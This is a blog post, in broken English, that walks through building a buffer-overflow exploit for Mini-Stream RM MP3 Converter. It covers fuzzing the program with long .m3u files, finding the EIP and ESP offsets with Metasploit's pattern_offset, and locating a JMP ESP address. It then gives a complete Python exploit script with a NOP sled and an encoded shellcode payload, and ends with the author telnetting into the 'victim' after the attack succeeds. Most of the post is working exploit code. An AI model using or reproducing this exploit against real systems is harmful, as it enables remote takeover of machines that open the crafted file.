21.26
blogkublogmu
now i try again to buffer overflow RM MP3, in this step to check buffer i use 3 code to make buffer the first make 10000 string caracter, the second 20000 caracter, third 30000 caracter, i will try one by one to know how many caracter i need to make buffer RM MP3.
in this job i use:
OllyDBG
Mini Stream RM MP3 Conveter
exploit make it by my self
file to buffer made by myself
ok lets begin try to buffer, start to 10000 character no buffer :'(, second try 20000 character, yupp,, buffer, try again with 30000 character, yupp,, buffer again, boom boom buffer
now i search on how many byte eip can buffer, i create string pattern 20000 character to known how byte need to go EIP and ESP. yupp got it boom crash again :D, now we will take EIP and ESP, EIP on root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb 0x36695735 20000
17417 <=
ESP: root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb i8W 20000
17425
ok next make program again to finding JMP ESP
i will create on EIP character DADADADA
yupp.. created..
#!usr/bin/python
file="eip.m3u"
junk="http://"+"\x90" * 17417
junk+="\xDA\xDA\xDA\xDA"
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()
now i will find create ESP: gotcha,, has created on esp CACACACACA :d
now i will find JMP ESP although shell.32, yup get it JMP ESP on 7C9D30D7:
after checked and binggo JMP ESP has get it now i will create the exploit
now i will create the exploit, i use my payload for exploitation before
#!usr/bin/python
file="exploit.m3u"
junk="http://"+"\x90" * 17417
junk+="\xD7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()
binggo crash,, crash,, crash,, now i will try telnet to victim:
gotcha,, let dance dance dance hahaa,,, done done done under attack.
successs...
Posted in: security
0 komentar:
Posting Komentar